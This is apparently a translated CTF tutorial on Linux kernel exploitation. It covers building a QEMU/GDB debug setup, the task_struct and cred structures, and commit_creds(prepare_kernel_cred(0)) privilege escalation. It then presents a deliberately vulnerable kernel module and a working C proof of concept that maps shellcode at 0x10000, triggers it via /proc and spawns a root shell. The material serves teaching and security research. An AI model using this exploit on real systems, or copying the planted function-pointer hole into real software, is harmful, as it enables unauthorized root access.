Introduction

This series of articles takes CTF competitions as its starting point and explains how Linux kernel vulnerabilities are analyzed, discovered, and exploited. This article introduces the background knowledge and preparation needed for kernel vulnerability exploitation.

Linux kernel mode and user mode

The following uses an Intel CPU as an example. Intel divides the privileges of CPU operations into four levels, from most to least privileged:

Ring 0: usually called kernel mode. The CPU can access all data in memory as well as peripheral devices such as hard disks and network cards, and it can switch itself from one program to another.
Ring 1: reserved.
Ring 2: reserved.
Ring 3: usually called user mode. Only limited access to memory is allowed, and peripheral devices cannot be accessed.

An inner ring has higher CPU privileges and can freely access the resources of the outer rings, while an outer ring cannot access the resources of an inner ring.

Therefore, kernel-mode vulnerabilities are more destructive than user-mode vulnerabilities, and gaining access to the kernel is basically equivalent to controlling the entire operating system.

Build Linux kernel analysis environment

To set up an environment for analyzing and debugging the kernel, you generally need to download the source of the corresponding kernel version from the official kernel website and compile it yourself. The author uses kernel version 4.19 here. The build may fail because of missing dependencies, which can be installed with apt on Ubuntu. The author installed the following packages locally:

sudo apt-get install libncurses5-dev
sudo apt-get install flex
sudo apt-get install bison
sudo apt-get install libssl-dev

Start by running make menuconfig to generate the config file. In this menu-driven configuration interface, enable some of the debugging options under Kernel hacking so that kernel vulnerabilities are easier to analyze. For details, refer to Linux Insides.

A default build produces several files, including vmlinux, System.map, and bzImage. The file of interest here is bzImage, the bootable kernel image, which on x86 is generated in the arch/x86/boot directory. CTF challenges generally provide three files: the kernel image, a startup script, and the root file system. With these, the whole operating system can be loaded in QEMU for analysis and debugging.

The root file system is built with BusyBox. After downloading the BusyBox source code, run make menuconfig to adjust the build options and enable the static binary option under Build Options. Then run make install, which creates an _install directory in the current directory containing the compiled files. After that, run the following script inside the _install directory to create what the system needs at boot:

#!/bin/sh
mkdir -pv {bin,sbin,etc,proc,sys,usr/{bin,sbin}}
echo """#!/bin/sh
mount -t proc none /proc
mount -t sysfs none /sys
mount -t debugfs none /sys/kernel/debug
mkdir /tmp
mount -t tmpfs none /tmp
mdev -s
exec /bin/sh""">>init
chmod +x init

Then switch to the _install directory and pack everything in it with find . | cpio -o --format=newc > ./rootfs.cpio. With bzImage and rootfs.cpio, the whole system can be booted in QEMU with the following command:

qemu-system-x86_64 -kernel ./bzImage -initrd ./rootfs.cpio -s -append "nokaslr"

The -s option is shorthand for -gdb tcp::1234: QEMU listens for a GDB remote connection on TCP port 1234, so GDB can attach to the running kernel over the network and interrupt it.

It is now possible to set a breakpoint on any function that has symbols. As an initial test, set a breakpoint on new_sync_read, which is hit whenever the user enters a command in the guest.

With that, a basic kernel debugging and analysis environment is in place.

How to escalate privileges in the kernel environment

Basic concepts

User: In Linux, a system that supports multitasking, a user is the credential for obtaining resources; in essence, a user is the owner of a set of assigned permissions.

Permissions: Permissions control which computer resources a user may access, such as CPUs, memory, and files.

Processes: The process is a fundamental concept in any operating system that supports multiprogramming. A process is usually defined as an instance of a program in execution. Processes carry out tasks on our behalf: the actions a user performs are actually performed by a process that carries the user's identity.

Process permissions: Because a process performs operations on behalf of a user, it must hold the corresponding permissions when the user wants to access system resources. In other words, a process must carry the identity of the user who started it in order to perform legitimate operations.

Kernel structures

Nearly all kernel code that deals with processes and programs is built around a data structure called task_struct. In Linux, the task_struct descriptors of all processes are linked into a single list. The structure is defined in include/linux/sched.h (reference: blog.csdn.net/u012489236/…).

Here we focus only on the process PID and on the cred structure used for permission control.

The PID types are defined in include/linux/pid.h. In 4.19 they are:

enum pid_type
{
    PIDTYPE_PID,
    PIDTYPE_TGID,
    PIDTYPE_PGID,
    PIDTYPE_SID,
    PIDTYPE_MAX,
};

You can run the following command to view the information:

admins@admins-virtual-machine:~/kernel/linux-4.19$ ps -T -eo tid,pid,pgid,tgid,sid,comm
  TID   PID  PGID  TGID   SID COMMAND
    1     1     1     1     1 systemd
    2     2     0     2     0 kthreadd
    3     3     0     3     0 rcu_gp
    4     4     0     4     0 rcu_par_gp
    6     6     0     6     0 kworker/0:0H-kb
    8     8     0     8     0 mm_percpu_wq
    9     9     0     9     0 ksoftirqd/0
   10    10     0    10     0 rcu_sched
   11    11     0    11     0 rcu_bh
   12    12     0    12     0 migration/0

When debugging remotely with GDB, finding the task_struct of the current process requires the PID of that process and the kernel global variable init_task, which is the task_struct of the initial kernel task. Each task_struct contains a tasks member that links all processes into a circular list. We can therefore walk every task_struct and compare PID values until we find our own process, using the following script:

# Helper function to find a task given a PID or the
# address of a task_struct.
# The result is set into $t
define find_task
  if ((unsigned)$arg0 > (unsigned)&_end)
    set $t=(struct task_struct *)$arg0
  else
    set $t=&init_task
    if (init_task.pid != (unsigned)$arg0)
      find_next_task $t
      while (&init_task!=$t && $t->pid != (unsigned)$arg0)
        find_next_task $t
      end
      if ($t == &init_task)
        printf "Couldn't find task; using init_task\n"
      end
    end
  end
  p $t
  p *(struct task_struct*)$t
  p *(const struct cred*)$t->cred
end

define find_next_task
  # Given a task address, find the next task in the linked list
  set $t = (struct task_struct *)$arg0
  set $offset=( (char *)&$t->tasks - (char *)$t)
  set $t=(struct task_struct *)( (char *)$t->tasks.next- (char *)$offset)
end

After running find_task with a PID as its argument, the task_struct and cred contents of the corresponding process can be inspected:

$5 = {
  usage = {
    counter = 0x2
  },
  uid = {
    val = 0x0
  },
  gid = {
    val = 0x0
  },
  suid = {
    val = 0x0
  },
  sgid = {
    val = 0x0
  },
  euid = {
    val = 0x0
  },
  egid = {
    val = 0x0
  },
  fsuid = {
    val = 0x0
  },
  fsgid = {
    val = 0x0
  },
  securebits = 0x0,
  cap_inheritable = {
    cap = {0x0, 0x0}
  },
  cap_permitted = {
    cap = {0xffffffff, 0x3f}
  },
  cap_effective = {
    cap = {0xffffffff, 0x3f}
  },
  cap_bset = {
    cap = {0xffffffff, 0x3f}
  },
  cap_ambient = {
    cap = {0x0, 0x0}
  },
  jit_keyring = 0x0,
  session_keyring = 0x0 <irq_stack_union>,
  process_keyring = 0x0 <irq_stack_union>,
  thread_keyring = 0x0 <irq_stack_union>,
  request_key_auth = 0x0 <irq_stack_union>,
  security = 0xffff88000714b6a0,
  user = 0xffffffff82653f40 <root_user>,
  user_ns = 0xffffffff82653fe0 <init_user_ns>,
  group_info = 0xffffffff8265b3c8 <init_groups>,
  rcu = {
    next = 0x0 <irq_stack_union>,
    func = 0x0 <irq_stack_union>
  }
}
$6 = (struct task_struct *) 0xffff880006575700

During debugging, the script above is a quick way to obtain the task_struct of a process. When writing shellcode, however, the task_struct is usually obtained from a register value or by calling the relevant kernel functions directly. Two approaches are available: the task_struct of the current process can be reached through the ESP register or through the GS register.

register unsigned long current_stack_pointer asm("esp");

static inline struct thread_info *current_thread_info(void)
{
    return (struct thread_info *)(current_stack_pointer & ~(THREAD_SIZE - 1));
}

static __always_inline struct task_struct *get_current(void)
{
    return current_thread_info()->task;
}

struct thread_info {
    struct task_struct *task;          /* main task structure */
    struct exec_domain *exec_domain;   /* execution domain */
    unsigned long flags;               /* low level flags */
    __u32 status;                      /* thread synchronous flags */
    ...
}

The code above is the lookup used in a 32-bit environment. In a 64-bit environment the lookup goes through the GS register, as the following code shows:

.text:FFFFFFFF810A77E0 __x64_sys_getuid proc near          ; DATA XREF: .rodata:FFFFFFFF820004F0↓o
.text:FFFFFFFF810A77E0                                     ; .rodata:FFFFFFFF82001BD8↓o ...
.text:FFFFFFFF810A77E0         call    __fentry__          ; Alternative name is '__ia32_sys_getuid'
.text:FFFFFFFF810A77E5         push    rbp
.text:FFFFFFFF810A77E6         mov     rax, gs:current_task
.text:FFFFFFFF810A77EF         mov     rax, [rax+0A48h]
.text:FFFFFFFF810A77F6         mov     rbp, rsp
.text:FFFFFFFF810A77F9         mov     esi, [rax+4]
.text:FFFFFFFF810A77FC         mov     rdi, [rax+88h]
.text:FFFFFFFF810A7803         call    from_kuid_munged
.text:FFFFFFFF810A7808         mov     eax, eax
.text:FFFFFFFF810A780A         pop     rbp
.text:FFFFFFFF810A780B         retn
.text:FFFFFFFF810A780B __x64_sys_getuid endp

Privilege escalation

A task_struct contains several pointers to cred structures:

/* Process credentials: */

/* Tracer's credentials at attach: */
const struct cred __rcu *ptracer_cred;

/* Objective and real subjective task credentials (COW): */
const struct cred __rcu *real_cred;

/* Effective (overridable) subjective task credentials (COW): */
const struct cred __rcu *cred;

The more important ones are real_cred and cred, which reflect the relationship between subject and object in the Linux kernel's credentials mechanism. The subject presents credentials that describe its own permissions, the object carries credentials that describe the permissions required to access it, and the kernel decides from these credentials and the requested operation whether the access is allowed. cred holds the subjective credentials and real_cred the objective credentials. The cred structure is as follows:

struct cred {
    atomic_t usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
    atomic_t subscribers;              /* number of processes subscribed */
    void *put_addr;
    unsigned magic;
#define CRED_MAGIC      0x43736564
#define CRED_MAGIC_DEAD 0x44656144
#endif
    kuid_t uid;                        /* real UID of the task */
    kgid_t gid;                        /* real GID of the task */
    kuid_t suid;                       /* saved UID of the task */
    kgid_t sgid;                       /* saved GID of the task */
    kuid_t euid;                       /* effective UID of the task */
    kgid_t egid;                       /* effective GID of the task */
    kuid_t fsuid;                      /* UID for VFS ops */
    kgid_t fsgid;                      /* GID for VFS ops */
    unsigned securebits;               /* SUID-less security management */
    kernel_cap_t cap_inheritable;      /* caps our children can inherit */
    kernel_cap_t cap_permitted;        /* caps we're permitted */
    kernel_cap_t cap_effective;        /* caps we can actually use */
    kernel_cap_t cap_bset;             /* capability bounding set */
    kernel_cap_t cap_ambient;          /* Ambient capability set */
#ifdef CONFIG_KEYS
    unsigned char jit_keyring;         /* default keyring to attach requested
                                        * keys to */
    struct key __rcu *session_keyring; /* keyring inherited over fork */
    struct key *process_keyring;       /* keyring private to this process */
    struct key *thread_keyring;        /* keyring private to this thread */
    struct key *request_key_auth;      /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
    void *security;                    /* subjective LSM security */
#endif
    struct user_struct *user;          /* real user ID subscription */
    struct user_namespace *user_ns;    /* user_ns the caps and keyrings are relative to. */
    struct group_info *group_info;     /* supplementary groups for euid/fsgid */
    struct rcu_head rcu;               /* RCU deletion hook */
} __randomize_layout;

The usual way to escalate privileges in the kernel is to call commit_creds(prepare_kernel_cred(0)). prepare_kernel_cred(0) builds a cred structure with root privileges (essentially a copy of the credentials of the initial task, process 0), and commit_creds() installs that cred structure on the current process, which gives the current process root privileges. Interested readers can read the source code of the two functions.

In our environment KASLR is disabled (the kernel is booted with nokaslr), so the addresses of these two functions are fixed. We can load the kernel executable vmlinux into IDA or a similar tool and, once loading completes, search for the commit_creds function:

.text:FFFFFFFF810B9810                   commit_creds proc near   ; CODE XREF: sub_FFFFFFFF810913D5+290↑p
.text:FFFFFFFF810B9810                                            ; sub_FFFFFFFF8109D865+15A↑p ...
.text:FFFFFFFF810B9810 E8 3B 7F B4 00    call    __fentry__
.text:FFFFFFFF810B9815 55                push    rbp
.text:FFFFFFFF810B9816 48 89 E5          mov     rbp, rsp
.text:FFFFFFFF810B9819 41 55             push    r13
.text:FFFFFFFF810B981B 41 54             push    r12
.text:FFFFFFFF810B981D 53                push    rbx

The __fentry__ function simply returns and can therefore be treated as a NOP, so commit_creds effectively starts at FFFFFFFF810B9815. We can nevertheless use 0xFFFFFFFF810B9810 as the commit_creds address. The prepare_kernel_cred function looks like this:

.text:FFFFFFFF810B9C00                   prepare_kernel_cred proc near          ; CODE XREF:
.text:FFFFFFFF810B9C00 E8 4B 7B B4 00                    call    __fentry__
.text:FFFFFFFF810B9C05 55                                push    rbp
.text:FFFFFFFF810B9C06 BE C0 00 60 00                    mov     esi, 6000C0h
.text:FFFFFFFF810B9C0B 48 89 E5                          mov     rbp, rsp
.text:FFFFFFFF810B9C0E 41 54                             push    r12
.text:FFFFFFFF810B9C10 49 89 FC                          mov     r12, rdi
.text:FFFFFFFF810B9C13 48 8B 3D 26 26 AD+                mov     rdi, cs:cred_jar
.text:FFFFFFFF810B9C13 01
.text:FFFFFFFF810B9C1A 53                                push    rbx
.text:FFFFFFFF810B9C1B E8 00 68 1B 00                    call    kmem_cache_alloc
.text:FFFFFFFF810B9C20 48 85 C0                          test    rax, rax
.text:FFFFFFFF810B9C23 0F 84 E2 00 00 00                 jz      loc_FFFFFFFF810B9D0B
.text:FFFFFFFF810B9C29 4D 85 E4                          test    r12, r12
.text:FFFFFFFF810B9C2C 48 89 C3                          mov     rbx, rax
.text:FFFFFFFF810B9C2F 0F 84 AB 00 00 00                 jz      loc_FFFFFFFF810B9CE0

We therefore use 0xFFFFFFFF810B9C00 as the prepare_kernel_cred address, and a simple shellcode looks like this:

xor rdi,rdi
mov rbx,0xFFFFFFFF810B9C00
call rbx
mov rbx,0xFFFFFFFF810B9810
call rbx
ret

There are other ways to obtain a function's address, for example through the debugger or /proc/kallsyms, which are not covered in detail here.

There are also other ways to escalate privileges. The system usually determines the permissions of a process by checking fields such as uid, gid, and fsgid in the cred structure; if all of them are 0, the process is treated as root. We can therefore locate the cred structure of the current process and overwrite these fields to achieve privilege escalation.

Example

1. Basic concepts

The Linux kernel is monolithic: all kernel functionality is concentrated in a single executable image. The advantage is that components can call each other directly without any communication mechanism, which makes the kernel fast; the disadvantage is poor extensibility. Linux therefore supports loadable kernel modules (LKMs; the .ko module format dates from version 2.6), which allow independently built modules to be loaded into the kernel and make it easy to extend kernel functionality. Loadable kernel modules are typically managed with the following commands:

insmod: load a kernel module
lsmod: list the loaded kernel modules
rmmod: unload a kernel module

In CTF competitions, most challenges provide a kernel module that contains a vulnerability, and players have to analyze the module and write an exploit targeted at that vulnerability.

2. Protection mechanisms

A. KASLR: kernel address space layout randomization, similar to ASLR in user space.

B. Stack protector: similar to the stack canary in user space; a cookie is placed on the kernel stack to detect stack overflows.

C. SMAP: Supervisor Mode Access Prevention, which prevents the kernel from accessing user-space data.

D. SMEP: Supervisor Mode Execution Prevention, which prevents the kernel from executing user-space code.

E. mmap_min_addr: the lowest address that mmap is allowed to map. It prevents null pointer dereference vulnerabilities from being exploited by mapping the zero page.

F. KPTI: kernel page-table isolation, whose main purpose is to mitigate CPU side-channel attacks and KASLR bypasses.

3. Interaction between user space and the kernel

A. syscall: Between user space and kernel space there is an intermediate layer, the system call (syscall) interface, which is the bridge between user mode and kernel mode. This improves kernel security and also eases portability, since only the same set of interfaces has to be implemented. In Linux, user space issues a system call to trap into kernel mode, traditionally through a software interrupt (int 0x80 on 32-bit x86; 64-bit x86 uses the dedicated syscall instruction), and the kernel then performs the requested operation.

B. ioctl: This is itself a system call, but it is used to send commands and data directly to a device driver or receive them from it.

C. open, read, and write: A driver is exposed as a file, so it can be operated on through ordinary file access.

4. Vulnerability types

A. Uninitialized, non-validated, or corrupted pointer dereference: for example a null pointer dereference in the kernel.

B. Memory corruption.

C. Integer issues: (arithmetic) integer overflow and sign conversion.

D. Race conditions: for example double fetch vulnerabilities.

This time, a null pointer dereference vulnerability is used for kernel privilege escalation. The source code of the module is as follows:

#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/proc_fs.h>
#include <linux/seq_file.h>

/* Function pointer at a fixed address that user space is able to map. */
void (*my_funptr)(void) = (void (*)(void))0x10000;

/* Any write to the proc entry calls through the pointer. */
ssize_t nullp_write(struct file *file, const char __user *buf, size_t len, loff_t *loff)
{
    my_funptr();
    return len;
}

static int __init null_dereference_init(void)
{
    static const struct file_operations mytest_proc_fops = {
        .write = nullp_write,
    };

    printk(KERN_ALERT "null_dereference driver init!\n");
    /* World-writable entry: /proc/test_kernel_npd */
    proc_create("test_kernel_npd", 0666, NULL, &mytest_proc_fops);
    return 0;
}

static void __exit null_dereference_exit(void)
{
    printk(KERN_ALERT "null_dereference driver exit\n");
}

module_init(null_dereference_init);
module_exit(null_dereference_exit);

Although this is described as a null pointer dereference, the mmap_min_addr mitigation in the Linux kernel prevents user space from mapping address 0 with mmap. The address of the function to call was therefore changed to 0x10000, which user space can still control, so that the vulnerability remains convenient to exploit.

The default BusyBox root file system cannot add other users with adduser. The author therefore used Ubuntu 16 Base as the root file system and added a test user in order to check whether the privilege escalation succeeds. After the system starts, load the vulnerable kernel module with the insmod command.

Then switch to the test user with su test.

The PoC code is as follows. It was compiled beforehand and placed in the root file system directory.

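#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>

/* Machine code of the shellcode listed above. */
static const unsigned char mypoc[] =
    "H1\xffH\xc7\xc3\x00\x9c\x0b\x81\xff\xd3H\xc7\xc3\x10\x98\x0b\x81\xff\xd3\xc3";

int main(void)
{
    /* Map one RWX page at 0x10000, the address the module calls. */
    void *addr0 = mmap((void *)0x10000, 4096, PROT_READ | PROT_WRITE | PROT_EXEC,
                       MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (addr0 == MAP_FAILED) {
        perror("mmap");
        return 1;
    }
    memcpy(addr0, mypoc, sizeof(mypoc) - 1);

    /* Writing to the proc entry makes the kernel call my_funptr(). */
    int mfd = open("/proc/test_kernel_npd", O_RDWR);
    if (mfd < 0) {
        perror("open");
        return 1;
    }
    ssize_t res = write(mfd, "run shellcode", 14);
    if (res < 0)
        perror("write");

    /* If the shellcode ran, this shell has root privileges. */
    system("/bin/bash");
    return 0;
}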

The result is as follows:

At this point the privileges have been escalated successfully.
